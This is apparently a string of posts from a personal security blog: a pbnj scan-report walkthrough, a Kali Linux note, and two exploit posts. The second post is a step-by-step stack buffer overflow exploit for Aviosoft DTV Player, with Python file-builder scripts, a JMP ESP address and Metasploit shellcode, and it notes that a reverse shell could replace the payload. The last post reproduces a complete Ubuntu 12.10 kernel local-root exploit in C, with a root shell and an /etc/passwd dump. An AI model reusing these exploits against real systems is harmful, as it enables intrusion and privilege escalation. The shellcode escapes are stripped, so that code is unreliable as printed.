/usr/share/man/man1/outputpbnj.1p.gz

root@find:~# outputpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Usage: outputpbnj [Query Options] [Config Options] [General Options]
Query Options:
-q --query <name> Perform sql query
-t --type <type> Output Type [csv,tab,html]
-f --file <filename> Store the result in file otherwise stdout
--both Print results and store them in a file
--dir <dir> Store the result in this directory [def .]

-l --lookup <name> Lookup descrition based on name
--list List of names and descriptions
-n --name Lookup all the names
-d --desc Lookup all the descriptions
-s --sql Lookup all the sql queries

Config Options:
--qconfig <file> Config of sql queries [def query.yaml]
--dbconfig <file> Config for accessing database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]

General Options:
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )


Okay, Let’s dump the latest result:

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Error in option spec: "test|=s"
Error in option spec: "debug|=s"

wtf!

It is not working for as expected, No problem i am going to edit the “outputpbnj”(perl script). I have to remove “|” from “test” and “debug”. Kali linux use LeafPad text editor so “leafpad /usr/bin/outputpbnj” or you can use gedit or kate/kwrite(KDE) . Then searching for “test|=s”:

GetOptions(
%options,
'type|t=s', 'file|f=s', 'lookup|l=s', 'both|b',
'query|q=s', 'names|n', 'desc|d', 'sql|s', 'list',
'dbconfig=s', 'configdir=s', 'dir=s', 'data=s', 'qconfig=s',
'test|=s', 'debug|=s',
'help|h' => sub { help(); },
'version|v' => sub { print_version(); },
'both' => sub { $bothOutput = 1 },
)
or exit 1;

Just remove the pipe “|” from “test” and “debug”, It should be :‘test=s’,    ‘debug=s’  Now save and run :

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Tue Mar 26 19:12:23 2013 localhost mysql up unknown versiontcp
Tue Mar 26 19:12:23 2013 localhost postgresql up unknown version tcp


It is possible save the output in different format. For example:

root@find:~# mkdir pbnjr
root@find:~# outputpbnj -q latestinfo -t html -f pbnjr/report.html
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.

root@find:~# cd pbnjr
root@find:~/pbnjr# ls
report.html
root@find:~/pbnjr# iceweasel report.html
root@find:~/pbnjr#

Another curiosity that i can use only one query(“-q”) or there are more…. no, I can use many command:

possiblevuln
sshmachines
allservices
services
unknown_version_up
unknown_banner_up
machines
mdump
servicesup
service_audit 

All the query command is available in outputpbnj script(With Description)!

These kind of tool really useful for vulnerability assessment. pbnj is really a nice tool.

Exploit writing – Stack based Buffer overflow

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

There are many exploit writing tutorials. But the corelan’s exploit writing tutorials are much much better. If you want to learn exploit development , of course you may get started with corelan too. Anyway,

Today i have tried to exploit an application , found at http://www.exploit-db.com/exploits/22932/ (The exploit script did not work for me). Exploiting the vulnerability was very easy but specifically finding the bad char was bit tricky. At least I was able to find all bad char using Corelan’s mona.py and exploited the application successfully.  The following tools i used to develop the exploit:

1. Vmware workstation .

2. Python.

3. Immunity Debbugger .

4. Mona.py. (Copy mona.py to “C:Program FilesImmunity IncImmunity DebuggerPyCommands”)

5. Windows XP3 and windows 7.

6. Metasploit.

If you are going to try/build this exploit yourself then you also need those above tools, So make sure to download them as your preparation.

i have downloaded the vulnerable application first and installed on windows xp3 vm.

                                      CRASH AND LENGTH OF BUFFER

The simple crash script was:

print "Creating expoit."
f=open("crash-me.PLF","w")
push="A" * 2000

try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

It will create a file “crash-me.PLF” . If i open the file in AviSoft DTV Player then it just crashes. Well, Let’s Attach with Immunity Debugger to see what is happening.

Click on Debbug>>Run .

Now let’s open the “crash-me.PLF” :

So its finally crashed and i saw esp and eip register contains “AAAAAAAA….” :

It clearly indicating that i control EIP which is mean the crash is really exploitable(Explaining later!).   Now it is time to find how many the stack requiring for getting overwritten EIP. So time to work with a great tool mona.py .  There was old odd way to do that but now we can do it using metasploit or mona.py very easily. We already know the application crashed since we sent 2000Bytes junk. So we will create a Cycling Patter using mona.

First i set default working folder for mona:

mona config -set workingfolder c:mona%p

Then Mona command is : 

!mona pattern_create 2000

 It just created a file in C:monaAviosoftDTV called “pattern.txt” . This time need to edit the script again and put the Cycling patter instead “A”.  the full script will be look like this:

print "Creating expoit."
f=open("crash-me.PLF","w")
push="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"

try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

Replacing “A”*2000 with following pattern generated by mona

Now need to regenerate the “crash-me.PLF” file and open with AviSoft DTV(Already attached with debugger) . So the application crashed again but  with mona’s Cycling pattern instead “AAAAAA…” . So i need to take note of EIP value. In my case it is “37694136” :

This time we need to figure out the exact bytes to overwrite EIP . For this mona is enough :

!mona pattern_offset 37694136

 It tells that we need 260 bytes to overwrite stack and more 4 bytes we will need to overwrite EIP. So it is 260+4=264 bytes

Let’s modify the script again:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Found by mona.py
eip ="BBBB" #more 4 bytes to overwrite EIP
junk="C"*1736 #Later will replace this with real shellcode

try:
f.write(push+eip+junk)
f.close()
print "File created"
except:
print "File cannot be created"

In the script i have replaced Cycling patter with 260 bytes “A” and more 4 bytes to overwrite EIP with “BBBB” then 1736 bytes (2000-264). If first junk(260 bytes) length is okay then EIP will be “BBBB”. Let’s try:

See EIP is 42424242=BBBB and ESP(Stack Pointer) is contains CCCC.. But here i see another problem that after EIP  some “CCCC”:

0012EB5C   42424242  BBBB
0012EB60 43434343 CCCC
0012EB64 43434343 CCCC
0012EB68 43434343 CCCC
0012EB6C 43434343 CCCC


We really need to jump over these nasty junk. See later on. Anyway, We see we are controlling EIP. Because there are  “BBBB”.

Our Next goal will be:

1. Replacing “BBBB” with valid pointer(Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC… after EIP) easy problem.
3. Replacing “CCCCCC…” with real shellcode.

                                                                   FIND EIP
Let’s find EIP address. EIP address can be found in application or OS dll. For reliability we should always try to use Application’s dll if possible. So In this application i am going to find the EIP from application’s dll. Again i will use use mona(mona is very powerful and i know what i am doing.) . So the command should be:

!mona jmp -r esp -o


It will create a file called “jmp.txt” in “C:monaAviosoftDTV” and there will be following contents:

0x6034c153 : jmp esp |  {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034c4db : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034d9cb : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x6034dc73 : jmp esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:Program FilesAviosoftAviosoft DTV Player ProConfiguration.dll)
0x640614e3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:Program FilesAviosoftAviosoft DTV Player ProMediaPlayerCtrl.dll)
0x640627a3 : jmp esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:Program FilesAviosoftAviosoft DTV Player ProMediaPlayerCtrl.dll)
0x64119bc3 : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:Program FilesAviosoftAviosoft DTV Player ProNetReg.dll)
0x6411a7ab : jmp esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:Program FilesAviosoftAviosoft DTV Player ProNetReg.dll)

Here i will use 0x6411a7ab. Before that for learning purpose let’s find this address manually using Immunity Debugger itself(First we need to trigger the crashed otherwise all dll won’t load properly):

1. Immunity Debugger menu : View>> View Executable Modules .
2. Find the “NetReg.dll” and double click on it:

3. Our goal is finding “JMP ESP” . 
4. Right click on the window and Search For>> All Commands>>

5. Now another window will pop up and search for “jmp esp”

I was keeping searching until found the 0x6411a7ab.

                             ATTEMPT TO EXECUTE SHELLCODE
Anyway, let’s get back to real work. We need to modify the script put the address in EIP variable instead “BBBB”. We should remember that windows is little endian , means we need reverse the address so EIP should be “0x6411a7ab=xabxa7x11x64. Here is the modified script:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="A"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="C"*1500 #Later will replace this with real shellcode

try:
f.write(push+eip+junk)
f.close()
print "File created"
except:
print "File cannot be created"
Let’s run the application through Debugger and it should now have the exact address i have set. Time to make the application execute the shellcode. So i am modifying the script again to make it more safe:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py, "A" Replaced with nops
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #More nops before reach to shellcode
shellcode="D"*1000 #Will replace with shellcode.
try:
f.write(push+eip+junk+shellcode)
f.close()
print "File created"
except:
print "File cannot be created"
What i did on above script is just replaced all “A” with nops. Nops mean do nothing but pass to next instruction(Not a good idea?). Recently i mentioned that after EIP we see some unnecessary “CCCCCC…”  which will completely break our exploit. Putting enough nops will solve this problem too. Before going to next step let’s test it if it is working as i expected.

1. Setting breakpoint at EIP address 0x6411a7ab to make sure that our exploit is reaching to right address. To do that we need to following :

Right click>>Go to >>Expression

2. When new window will pop up , search the eip address,  You may need to search it twice. If found the address then we will see like this:

3. Now press F2. It may warn you about breakpointing to this address but you can ignore the warning. Well, Now i am going to open it(Attached with debugger). It hits the breakpoint and i can see now i am landing to nops directly:

So it worked!

Let’s put real shellcode instead “D”. It is time to use metasploit to generate windows/exec shellcode to execute calc.exe:

msfpayload windows/exec cmd=calc R |msfencode -b "x00x0a" -t c

I tried to avoid the normal bad char “x00x0a”. And Metasploit  generated following shellcode:

 

[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] =
"xbex28xc7x1bx1fxd9xedxd9x74x24xf4x58x31xc9xb1"
"x32x31x70x12x83xe8xfcx03x58xc9xf9xeax64x3dx74"
"x14x94xbexe7x9cx71x8fx35xfaxf2xa2x89x88x56x4f"
"x61xdcx42xc4x07xc9x65x6dxadx2fx48x6ex03xf0x06"
"xacx05x8cx54xe1xe5xadx97xf4xe4xeaxc5xf7xb5xa3"
"x82xaax29xc7xd6x76x4bx07x5dxc6x33x22xa1xb3x89"
"x2dxf1x6cx85x66xe9x07xc1x56x08xcbx11xaax43x60"
"xe1x58x52xa0x3bxa0x65x8cx90x9fx4ax01xe8xd8x6c"
"xfax9fx12x8fx87xa7xe0xf2x53x2dxf5x54x17x95xdd"
"x65xf4x40x95x69xb1x07xf1x6dx44xcbx89x89xcdxea"
"x5dx18x95xc8x79x41x4dx70xdbx2fx20x8dx3bx97x9d"
"x2bx37x35xc9x4ax1ax53x0cxdex20x1ax0exe0x2ax0c"

Anyway, Let’s modify the script again:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #500 nops before real shellcode
shellcode=("xbex28xc7x1bx1fxd9xedxd9x74x24xf4x58x31xc9xb1"
"x32x31x70x12x83xe8xfcx03x58xc9xf9xeax64x3dx74"
"x14x94xbexe7x9cx71x8fx35xfaxf2xa2x89x88x56x4f"
"x61xdcx42xc4x07xc9x65x6dxadx2fx48x6ex03xf0x06"
"xacx05x8cx54xe1xe5xadx97xf4xe4xeaxc5xf7xb5xa3"
"x82xaax29xc7xd6x76x4bx07x5dxc6x33x22xa1xb3x89"
"x2dxf1x6cx85x66xe9x07xc1x56x08xcbx11xaax43x60"
"xe1x58x52xa0x3bxa0x65x8cx90x9fx4ax01xe8xd8x6c"
"xfax9fx12x8fx87xa7xe0xf2x53x2dxf5x54x17x95xdd"
"x65xf4x40x95x69xb1x07xf1x6dx44xcbx89x89xcdxea"
"x5dx18x95xc8x79x41x4dx70xdbx2fx20x8dx3bx97x9d"
"x2bx37x35xc9x4ax1ax53x0cxdex20x1ax0exe0x2ax0c")
shellcode+="x90"*900 #Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:
f.write(all)
f.close()
print "File created"
except:
print "File cannot be created"

Well, ReGenerate the “crash-me.PLF” file and opening with the attached avisoft dtv but unfortunately it just crashed….

It does not even land to nops(wtf!). Seems it is happening for bad char, some code has been truncated. But no problem we can find the bad char using mona and this was my new knowledge today learning to use mona to find bad char easily. bad chars can corrupt, truncate our shellcode. If there is any bad chars then our exploits won’t work!

So instead spending much time i am going to use mona to find the bad chars(This will be good idea).I am using the first crash PoC again. Let’s see how i did it.

                                                    

                                                      FINDING BAD CHARS
First command:

!mona bytearray -b "x00"

“x00” is common bad char so i used it to generate all bytecode using mona.

Mona created two file in C:monaAviosoftDTV , 1. bytearray.txt 2. bytearray.bin . bytearray.bin is binary which will need later for comparing.

Well, in bytearray.txt are following contents :

Modify the script and put the generated output to the script right after  variable push=”A”*2000 :

print "Creating expoit."
f=open("badchar.PLF","w") #Create the file

push="A"*2000 #Found by mona.py
push+=("x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")


try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

Now generate the file “badchar.PLF”. Attach the application with debugger, run, open “badchar.PLF” and use another mona command is :

!mona compare -f C:monaAviosoftDTVbytearray.bin

It will create another file called “compare.txt” when we will see like this:

open “compare.txt” in notepad and search for “stack”(http://pastebin.com/YLCnyne7) and after scrolling down a little bit i can see :

                | File           | Memory         | Note       
---------------------------------------------------------------
0 0 9 9 | 01 ... 09 | 01 ... 09 | unmodified!
---------------------------------------------------------------
9 9 99 100 | 0a ... 6c | 00 ... 61 | expanded
108 109 1 1 | 6d | 6d | unmodified!
109 110 5 5 | 6e 6f 70 71 72 | 20 46 69 6c 65 | corrupted
114 115 1 1 | 73 | 73 | unmodified!
115 116 2 2 | 74 75 | 5c 41 | corrupted
117 118 1 1 | 76 | 76 | unmodified!
118 119 137 137 | 77 ... ff | 69 ... 00 | corrupted

Possibly bad chars: 0a
Bytes omitted from input: 00

It is comparing data’s file and memory. If there is no bad char then File and Memory data will be same. See above the first line:

9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded 

Unfortunately it did not match. Mona also suggesting that the bad char may be “0a” because “0a” from file does not match to memory … is it?

So this time again we need to generate bytearray:

!mona bytearray -b "x00x0a"

Now we again need to compare with bytearray(See above, it is same)…. Just keep doing it until i found all bad chars.

                             

                                              EXECUTE SHELLCODE
By mona i found the bad chars are “x00xffx0ax0dx1a” . After found these bad chars i regenerated the shellcode:

root@pusheax.com:/usr/bin# msfpayload windows/exec cmd=calc R |msfencode -b "x00xffx0ax0dx1axff" -t c
[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] =
"xdaxdbxd9x74x24xf4x5bx31xc9xb1x32xb8x6exb9xe3"
"x05x31x43x17x83xc3x04x03x2dxaax01xf0x4dx24x4c"
"xfbxadxb5x2fx75x48x84x7dxe1x19xb5xb1x61x4fx36"
"x39x27x7bxcdx4fxe0x8cx66xe5xd6xa3x77xcbxd6x6f"
"xbbx4dxabx6dxe8xadx92xbexfdxacxd3xa2x0exfcx8c"
"xa9xbdx11xb8xefx7dx13x6ex64x3dx6bx0bxbaxcaxc1"
"x12xeax63x5dx5cx12x0fx39x7dx23xdcx59x41x6ax69"
"xa9x31x6dxbbxe3xbax5cx83xa8x84x51x0exb0xc1x55"
"xf1xc7x39xa6x8cxdfxf9xd5x4ax55x1cx7dx18xcdxc4"
"x7cxcdx88x8fx72xbaxdfxc8x96x3dx33x63xa2xb6xb2"
"xa4x23x8cx90x60x68x56xb8x31xd4x39xc5x22xb0xe6"
"x63x28x52xf2x12x73x38x05x96x09x05x05xa8x11x25"
"x6ex99x9axaaxe9x26x49x8fx06x6dxd0xb9x8ex28x80"
"xf8xd2xcax7ex3exebx48x8bxbex08x50xfexbbx55xd6"
"x12xb1xc6xb3x14x66xe6x91x76xe9x74x79x79";

Well, Let’s modify the script again,change the shellcode. The Final reliable working exploit is:

print "Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="x90"*260 #Found by mona.py
eip ="xabxa7x11x64" #EIP
junk="x90"*500 #500 nops before real shellcode

#msfpayload windows/exec cmd=calc R |msfencode -b "x00xffx0ax0dx1axff" -t c
shellcode=("xdaxdbxd9x74x24xf4x5bx31xc9xb1x32xb8x6exb9xe3"
"x05x31x43x17x83xc3x04x03x2dxaax01xf0x4dx24x4c"
"xfbxadxb5x2fx75x48x84x7dxe1x19xb5xb1x61x4fx36"
"x39x27x7bxcdx4fxe0x8cx66xe5xd6xa3x77xcbxd6x6f"
"xbbx4dxabx6dxe8xadx92xbexfdxacxd3xa2x0exfcx8c"
"xa9xbdx11xb8xefx7dx13x6ex64x3dx6bx0bxbaxcaxc1"
"x12xeax63x5dx5cx12x0fx39x7dx23xdcx59x41x6ax69"
"xa9x31x6dxbbxe3xbax5cx83xa8x84x51x0exb0xc1x55"
"xf1xc7x39xa6x8cxdfxf9xd5x4ax55x1cx7dx18xcdxc4"
"x7cxcdx88x8fx72xbaxdfxc8x96x3dx33x63xa2xb6xb2"
"xa4x23x8cx90x60x68x56xb8x31xd4x39xc5x22xb0xe6"
"x63x28x52xf2x12x73x38x05x96x09x05x05xa8x11x25"
"x6ex99x9axaaxe9x26x49x8fx06x6dxd0xb9x8ex28x80"
"xf8xd2xcax7ex3exebx48x8bxbex08x50xfexbbx55xd6"
"x12xb1xc6xb3x14x66xe6x91x76xe9x74x79x79")
shellcode+="x90"*900 #Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:
f.write(all)
f.close()
print "File created"
except:
print "File cannot be created"

After regenerating the “crash-me.PLF” open in AviSoft DTV and it will execute calc.exe. I did it in debugger with pressing F9:

Anytime We can change the windows/exec shellcode to reverse shellcode which will connect to my specified IP address with command shell. 

The same exploit will work on windows 7 too :

Because i used EIP address from the application itself. If i would use the EIP from OS dll then of course the exploit won’t work(The advantage of application’s dll).

This is it!

Note: Exploit writing is much more about research. Without researching it is not possible to be an exploit writer . If you have questions,advices, please comment here or mail me and i will try to answer(Love to discuss!).
If you want to learn more about exploit development(In details) , read corelan’s tutorial https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/.Much better than other commercial training :).

Backtrack reborn as Kali – downloaded Kali Linux

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

BackTrack Reborn as Kali Linux. Yesterday i have downloaded Kali Linux from http://www.kali.org/downloads/ which has gnome as default DE (Classic mode) . Most penetration testers knows about Backtrack Linux which was Ubuntu based. Now it is based on Debian which is big advantage of it. This is more nice that They made it more simpler and looks beautiful.

It seems they did not included much new tools , maybe they excluded some tools from the Kali Linux. There is also not any directory called /penetesting .

All tools are installed in /usr/bin and /usr/local/sbin . Peoples now need to search the tools using locate,whereis etc if they don’t know the name of tools. Truthfully, Kali(Backtrack Linux) now bit hard for newbie and Newbie should not try this pentesting distribution. But believe me, It is now enough good .

Note: using tools is not skid. Everybody uses tools. Operating system itself is a tool. They are skid who are doing the thing without knowing anything. You are good to go with new Kali linux if you are good in Linux(Debian).

Kali: http://www.kali.org/downloads/

Ubuntu 12.10 Local Root Exploit

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Everybody know Ubuntu is a popular Linux distro(Basically for newbie). Today i was visiting exploitdb and found the Ubuntu 12.10 Local root exploit which worked only on 64bit.

I have tested the code since i had Ubuntu 12.10 installed on my vm already.

Code:

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
x()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

char stage1[] = "xffx25x00x00x00x00x00x00x00x00x00x00x00";

int main() {
int fd;
unsigned long mmap_start, mmap_size = 0x10000;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[8192];

if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socketn");
return -1;
}

memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;

req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

/* Ubuntu 12.10 x86_64 */
req.r.sdiag_family = 0x37;
commit_creds = (_commit_creds) 0xffffffff8107d180;
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
mmap_start = 0x1a000;

if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

printf("mmap faultn");
exit(1);
}

*(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
memset((void *)mmap_start, 0x90, mmap_size);
memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

send(fd, &req, sizeof(req), 0);
if(!getuid())
system("/bin/sh");
}

test@weird:~/Documents$ gcc -o ubu *
test@weird:~/Documents$ ls
test.c ubu
test@weird:~/Documents$ ./ubu
# whoami
root

# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
